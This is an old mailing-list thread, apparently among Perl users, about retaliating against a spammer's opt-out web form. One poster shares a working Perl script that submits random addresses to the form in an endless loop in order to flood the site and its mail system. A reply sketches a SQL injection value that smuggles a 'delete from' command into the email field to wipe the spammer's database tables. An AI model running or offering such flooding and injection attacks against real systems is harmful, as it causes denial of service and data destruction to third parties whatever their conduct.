> awesome - I may modify the script to fire off for an hour or so upon
> receiving spam mail.

me ponders about something like this:

for $table (a,aa,ab,ac){
$email="[EMAIL PROTECTED]';delete from $table;";

and start parsing through will you get the correct table name.


> Andy
> On Tue, 2003-08-05 at 10:28, Earle Martin wrote:
> > Like most people, I hate spam. I hate it even more when I'm at home
> > recovering from being sick and skimming through my inbox. So, when I
> > received the following (bowdlerised for the archives):
> >
> > > From: <[EMAIL PROTECTED]>
> > >
> > >
> > > Do not reply to this email; it has been automatically generated.
> > >
> > > To add this email address to our Do Not Email List click here:
> > > https://Word-of-Mouth.Org/[EMAIL PROTECTED]
> >
> > It prompted me to take five minutes and write this. It's not very efficient
> > (why use a different prefix and suffix? I dunno, I just felt like it), but I
> > like it. At time of speaking it's been running for, oh, about 15 minutes. I
> > think I'll let it get to an hour.
> >
> >
> > #!/usr/bin/perl -w
> >
> > use strict;
> >
> > use LWP::Simple;
> >
> > my ($prefix, $suffix, $email);
> >
> > my @letters = ('a'..'z');
> >
> > while (1) {
> >
> >     $prefix = '';
> >     $suffix = '';
> >
> >     for (1..10) {
> >             $prefix = $prefix . $letters[int(rand(26))];
> >             $suffix = $suffix . $letters[int(rand(26))];
> >     }
> >
> >     $email = $prefix . '@' . $suffix . ".com";
> >     
> > get("https://Word-of-Mouth.Org/DoNotEmailListConfirm.asp?EMAIL_ADDRESS=$email";);
> >
> >     print "$email\n";
> >
> > }
> >
> >
> > FWIW, their ASP is very badly coded, and an email address of over 50
> > characters causes a "Microsoft OLE DB Provider for ODBC Drivers error
> > '80040e57'". But I thought it would be more fun to do this, especially since
> > every time that form is submitted their system sends out an email.
> >
> > And now I'm going back to bed.
> >

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